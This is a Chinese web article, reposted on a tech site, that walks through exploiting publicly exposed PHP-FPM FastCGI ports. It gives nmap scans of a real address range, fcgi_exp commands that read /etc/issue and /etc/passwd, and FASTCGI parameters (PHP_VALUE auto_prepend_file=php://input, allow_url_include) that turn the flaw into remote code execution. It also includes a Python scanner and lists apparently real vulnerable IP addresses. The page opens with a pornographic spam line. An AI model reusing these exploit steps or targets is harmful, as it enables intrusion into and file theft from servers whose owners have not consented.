欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

fastcgi文件讀取漏洞之python掃描腳本

 更新時(shí)間:2017年04月23日 22:43:34   投稿:mdxy-dxy  
這篇文章主要介紹了fastcgi文件讀取漏洞之python掃描腳本,需要的朋友可以參考下

PHP FastCGI的遠(yuǎn)程利用

說(shuō)到FastCGI,大家都知道這是目前最常見(jiàn)的webserver動(dòng)態(tài)腳本執(zhí)行模型之一。目前基本所有web腳本都基本支持這種模式,甚至有的類(lèi)型腳本這是唯一的模式(ROR,Python等)。

FastCGI的主要目的就是,將webserver和動(dòng)態(tài)語(yǔ)言的執(zhí)行分開(kāi)為兩個(gè)不同的常駐進(jìn)程,當(dāng)webserver接收到動(dòng)態(tài)腳本的請(qǐng)求,就通過(guò)fcgi協(xié)議將請(qǐng)求通過(guò)網(wǎng)絡(luò)轉(zhuǎn)發(fā)給fcgi進(jìn)程,由fcgi進(jìn)程進(jìn)行處理之后,再將結(jié)果傳送給webserver,然后webserver再輸出給瀏覽器。這種模型由于不用每次請(qǐng)求都重新啟動(dòng)一次cgi,也不用嵌入腳本解析器到webserver中去,因此可伸縮性很強(qiáng),一旦動(dòng)態(tài)腳本請(qǐng)求量增加,就可以將后端fcgi進(jìn)程單獨(dú)設(shè)立一個(gè)集群提供服務(wù),很大的增加了可維護(hù)性,這也是為什么fcgi等類(lèi)似模式如此流行的原因之一。

然而正是因?yàn)檫@種模式,卻也帶來(lái)了一些問(wèn)題。例如去年80sec發(fā)布的《nginx文件解析漏洞》 實(shí)際上就是由于fcgi和webserver對(duì)script路徑級(jí)參數(shù)的理解不同出現(xiàn)的問(wèn)題。除此之外,由于fcgi和webserver是通過(guò)網(wǎng)絡(luò)進(jìn)行溝通的,因此目前越來(lái)越多的集群將fcgi直接綁定在公網(wǎng)上,所有人都可以對(duì)其進(jìn)行訪問(wèn)。這樣就意味著,任何人都可以偽裝成webserver,讓fcgi執(zhí)行我們想執(zhí)行的腳本內(nèi)容。

ok,以上就是背景原理解釋?zhuān)疫@里就用我最熟悉的PHP給各位做個(gè)例子。

php的fastcgi目前通常叫做FPM。他默認(rèn)監(jiān)聽(tīng)的端口是9000端口。我們這里用nmap直接掃描一下:

nmap -sV -p 9000 --open x.x.x.x/24

為什么要用sV?因?yàn)?000端口可能還存在其他服務(wù),這里需要借用nmap的指紋識(shí)別先幫我們鑒定一下。

[root@test:~/work/fcgi]#nmap -sV -p 9000 --open 173.xxx.xxx.1/24

Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-14 20:06 EDT
Nmap scan report for abc.net (173.xxx.xxx.111)
Host is up (0.0095s latency).
PORT     STATE SERVICE VERSION
9000/tcp open  ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Nmap scan report for abc.com (173.xxx.xxx.183)
Host is up (0.0096s latency).
PORT     STATE SERVICE    VERSION
9000/tcp open  tcpwrapped

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 256 IP addresses (198 hosts up) scanned in 7.70 seconds

隨便掃描了一下,運(yùn)氣不錯(cuò),一個(gè)C段有2個(gè)開(kāi)放9000端口的,不過(guò)其中一個(gè)是被管理員修改的sshd,另一個(gè)tcpwrapped,才是我們的目標(biāo)。

為了做測(cè)試,我寫(xiě)了一個(gè)fastcgi的客戶(hù)端程序,直接向?qū)Ψ桨l(fā)起請(qǐng)求。我們利用一個(gè)開(kāi)放的fastcgi能有什么作用?這里和普通的http請(qǐng)求有一點(diǎn)不同,因?yàn)閣ebserver為了提供fastcgi一些參數(shù),每次轉(zhuǎn)發(fā)請(qǐng)求的時(shí)候,會(huì)通過(guò)FASTCGI_PARAMS的包向fcgi進(jìn)程進(jìn)行傳遞。本來(lái)這些參數(shù)是用戶(hù)不可控的,但是既然這個(gè)fcgi對(duì)外開(kāi)放,那么也就說(shuō)明我們可以通過(guò)設(shè)定這些參數(shù),來(lái)讓我們?nèi)プ鲆恍┰咀霾坏降氖虑椋?/p>

[root@test:~/work/fcgi]#./fcgi_exp read 173.xxx.xxx.183 9000 /etc/issue

X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-type: text/html www.dbjr.com.cn

Ubuntu 10.04.3 LTS \n \l

讀到了/etc/issue文件,可以看到這是臺(tái)ubuntu 10.04的機(jī)器。那又是怎么實(shí)現(xiàn)的呢?其實(shí)我們只要在FASTCGI_PARAMS中,設(shè)定 DOCUMENT_ROOT為"/"根目錄即可,隨后再設(shè)置SCRIPT_FILENAME為/etc/issue。這樣,只要我們有權(quán)限,我們就可以控制fcgi去讀取這臺(tái)機(jī)器上的任意文件了。實(shí)際上這并不是讀取,而是用php去執(zhí)行它。

既然是執(zhí)行,所以其實(shí)這個(gè)漏洞就類(lèi)似于一個(gè)普通的LFI漏洞,如果你知道這臺(tái)機(jī)器上的log路徑,或者任何你可以控制內(nèi)容的文件路徑,你就可以執(zhí)行任意代碼了。

到此為止了么?不,如果利用log或者去猜其他文件路徑去執(zhí)行代碼,還是不夠方便,有沒(méi)有更為方便的利用方式可以讓我執(zhí)行任意我提交的代碼呢?

這里我也找了很多辦法,最先想到的是傳遞env參數(shù)過(guò)去然后去執(zhí)行/proc/self/environ文件,可惜php-fpm在接收到我的參數(shù)值后只是在內(nèi)存中修改了環(huán)境變量,并不會(huì)直接改動(dòng)這個(gè)文件。因此沒(méi)法利用。況且這個(gè)方式也不是所有系統(tǒng)都通用。

我們還有一種方法,在我之前寫(xiě)的《CVE-2012-1823(PHP-CGI RCE)的PoC及技術(shù)挑戰(zhàn)》中,可以通過(guò)動(dòng)態(tài)修改php.ini中的auto_prepend_file的值,去遠(yuǎn)程執(zhí)行任意文件。將一個(gè)LFI的漏洞變成了RFI,這樣可利用空間就大大增加。

fastcgi是否也支持類(lèi)似的動(dòng)態(tài)修改php的配置?我查了一下資料,發(fā)現(xiàn)原本FPM是不支持的,直到某開(kāi)發(fā)者提交了一個(gè)bug,php官方才將此特性Merge到php 5.3.3的源碼中去。

通用通過(guò)設(shè)置FASTCGI_PARAMS,我們可以利用PHP_ADMIN_VALUE和PHP_VALUE去動(dòng)態(tài)修改php的設(shè)置。

env["REQUEST_METHOD"] = "POST"
env["PHP_VALUE"] = "auto_prepend_file = php://input"
env["PHP_ADMIN_VALUE"] = "allow_url_include = On\ndisable_functions = \nsafe_mode = Off"

利用執(zhí)行php://input,然后在POST的內(nèi)容中寫(xiě)入我們的php代碼,這樣就可以直接執(zhí)行了。

[root@test:~/work/fcgi]#./fcgi_exp system 127.0.0.1 9000 /tmp/a.php "id; uname -a"   

X-Powered-By: PHP/5.5.0-dev
Content-type: text/html

uid=500(www) gid=500(www) groups=500(www)
Linux test 2.6.18-308.13.1.el5 #1 SMP Tue Aug 21 17:51:21 EDT 2012 x86_64 x86_64 x86_64 GNU/Linux

細(xì)心者會(huì)注意到這里有些變化,我換了本機(jī)做測(cè)試。因?yàn)殚_(kāi)始發(fā)現(xiàn)的那臺(tái)機(jī)器php版本是5.3.2,正好低于5.3.3,因此無(wú)法利用修改ini設(shè)置去執(zhí)行代碼,只能去猜路徑。

另一個(gè)變化是,我這里去讀取/tmp/a.php這個(gè)php文件,而不是去讀取/etc/issue。因?yàn)樵?.3.9開(kāi)始,php官方加入了一個(gè)配置"security.limit_extensions",默認(rèn)狀態(tài)下只允許執(zhí)行擴(kuò)展名為".php"的文件。因此你必須找到一個(gè)已經(jīng)存在的php文件。而這個(gè)設(shè)置是php-fpm.conf里的,無(wú)法通過(guò)修改ini的配置去覆蓋它。如果誰(shuí)能有更好的辦法可以繞過(guò)這個(gè)限制,請(qǐng)告訴我。

ok,目前為止對(duì)php-fpm的所有測(cè)試已經(jīng)結(jié)束,我們利用一個(gè)對(duì)外開(kāi)放的fcgi進(jìn)程,已經(jīng)可以直接獲取shell了。各位不如也去研究一下其他fcgi,或許會(huì)有更多發(fā)現(xiàn)。

如何防止這個(gè)漏洞?很簡(jiǎn)單,千萬(wàn)不要把fcgi接口對(duì)公網(wǎng)暴露。同時(shí)也希望將來(lái)fcgi會(huì)有身份認(rèn)證機(jī)制。

任何系統(tǒng)上編譯,請(qǐng)安裝golang之后,執(zhí)行:
go build fcgi_exp.go

fastcgi文件讀取漏洞python掃描腳本

fastcgi文件讀?。ùa執(zhí)行)是個(gè)很老的漏洞,漏洞描述: PHP FastCGI 的遠(yuǎn)程利用

利用該漏洞可讀取系統(tǒng)文件,甚至有一定幾率成功執(zhí)行代碼。 下載上述文章中提到的: fcgi_exp

協(xié)議細(xì)節(jié)其實(shí)我已不關(guān)心,只需要一個(gè)python的掃描腳本。于是拿wireshark抓了下GaRY的程序,寫(xiě)一小段代碼。

外網(wǎng)暴露9000端口的機(jī)器自然是非常非常少的,但內(nèi)網(wǎng)可就說(shuō)不定了。

import socket
import sys

def test_fastcgi(ip):
  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM); sock.settimeout(5.0)
  sock.connect((ip, 9000))
  data = """
  01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00
  01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53 
  54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52 
  56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50 
  2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52
  4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44
  52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49 
  50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f 
  70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53
  4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69
  63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00
  """
  data_s = ''
  for _ in data.split():
    data_s += chr(int(_,16))
  sock.send(data_s)
  try:
    ret = sock.recv(1024)
    if ret.find(':root:') > 0:
      print ret
      print '%s is vulnerable!' % ip
      return True
    else:
      return False
  except Exception, e:
    pass
      
  sock.close()


if __name__ == '__main__':
  if len(sys.argv) == 1:
    print sys.argv[0], '[ip]'
  else:
    test_fastcgi(sys.argv[1])

通過(guò)快速掃描9000端口,可以發(fā)現(xiàn)幾個(gè)存在漏洞的機(jī)器:

110.164.68.137 is vul !
110.164.68.148 is vul !
110.164.68.149 is vul !
110.164.68.151 is vul !
110.164.68.154 is vul !
110.164.68.155 is vul !

fcgi_exp.exe read 110.164.68.137 9000 /etc/passwd

相關(guān)文章

  • Python Pyecharts繪制箱線圖詳解

    Python Pyecharts繪制箱線圖詳解

    箱形圖(Box-plot)又稱(chēng)為盒須圖、盒式圖或箱線圖,是一種用作顯示一組數(shù)據(jù)分散情況資料的統(tǒng)計(jì)圖。因形狀如箱子而得名。本文將通過(guò)Python Pyecharts來(lái)繪制一些箱線圖,需要的可以參考一下
    2022-03-03
  • python提取word文件中的圖片并上傳阿里云OSS

    python提取word文件中的圖片并上傳阿里云OSS

    這篇文章主要介紹了通過(guò)Python提取Word文件中的所有圖片,并將其上傳至阿里云OSS。文中的示例代碼對(duì)學(xué)習(xí)Python有一定的幫助,快跟隨小編一起學(xué)習(xí)一下吧
    2021-12-12
  • TensorFlow的權(quán)值更新方法

    TensorFlow的權(quán)值更新方法

    今天小編就為大家分享一篇TensorFlow的權(quán)值更新方法,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。一起跟隨小編過(guò)來(lái)看看吧
    2018-06-06
  • 使用PowerShell實(shí)現(xiàn)批量修改或替換文件名

    使用PowerShell實(shí)現(xiàn)批量修改或替換文件名

    這篇文章主要為大家介紹了基于PowerShell語(yǔ)言,對(duì)文件夾中全部文件的名稱(chēng)加以批量替換、修改的方法,文中的示例代碼講解詳細(xì),感興趣的可以了解一下
    2023-04-04
  • python中實(shí)現(xiàn)字符串翻轉(zhuǎn)的方法

    python中實(shí)現(xiàn)字符串翻轉(zhuǎn)的方法

    這篇文章主要介紹了python中實(shí)現(xiàn)字符串翻轉(zhuǎn)的方法,代碼很簡(jiǎn)單,非常不錯(cuò),具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2018-07-07
  • Python單元和文檔測(cè)試實(shí)例詳解

    Python單元和文檔測(cè)試實(shí)例詳解

    這篇文章主要介紹了Python單元和文檔測(cè)試,結(jié)合實(shí)例形式分析了Python單元測(cè)試模塊unittest及文檔測(cè)試模塊doctest相關(guān)使用技巧,需要的朋友可以參考下
    2019-04-04
  • Python進(jìn)階之import導(dǎo)入機(jī)制原理詳解

    Python進(jìn)階之import導(dǎo)入機(jī)制原理詳解

    在Python中,一個(gè).py文件代表一個(gè)Module。在Module中可以是任何的符合Python文件格式的Python腳本。了解Module導(dǎo)入機(jī)制大有用處??旄S小編一起學(xué)習(xí)一下吧
    2022-11-11
  • Python基礎(chǔ)學(xué)習(xí)之常見(jiàn)的內(nèi)建函數(shù)整理

    Python基礎(chǔ)學(xué)習(xí)之常見(jiàn)的內(nèi)建函數(shù)整理

    所謂的內(nèi)建函數(shù),可以直接使用,而不需要import。下面這篇文章主要給大家整理介紹了關(guān)于Python基礎(chǔ)學(xué)習(xí)之常見(jiàn)的一些內(nèi)建函數(shù),文中通過(guò)示例代碼為大家介紹的非常詳細(xì),需要的朋友可以參考借鑒,下面跟著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧。
    2017-09-09
  • Python實(shí)現(xiàn)大文件排序的方法

    Python實(shí)現(xiàn)大文件排序的方法

    這篇文章主要介紹了Python大文件排序的方法,涉及Python針對(duì)文件、緩存及日期等操作的相關(guān)技巧,具有一定參考借鑒價(jià)值,需要的朋友可以參考下
    2015-07-07
  • Python OpenCV圖像模糊處理介紹

    Python OpenCV圖像模糊處理介紹

    大家好,本篇文章主要講的是Python OpenCV圖像模糊處理介紹,感興趣的同學(xué)趕快來(lái)看一看吧,對(duì)你有幫助的話記得收藏一下
    2022-01-01

最新評(píng)論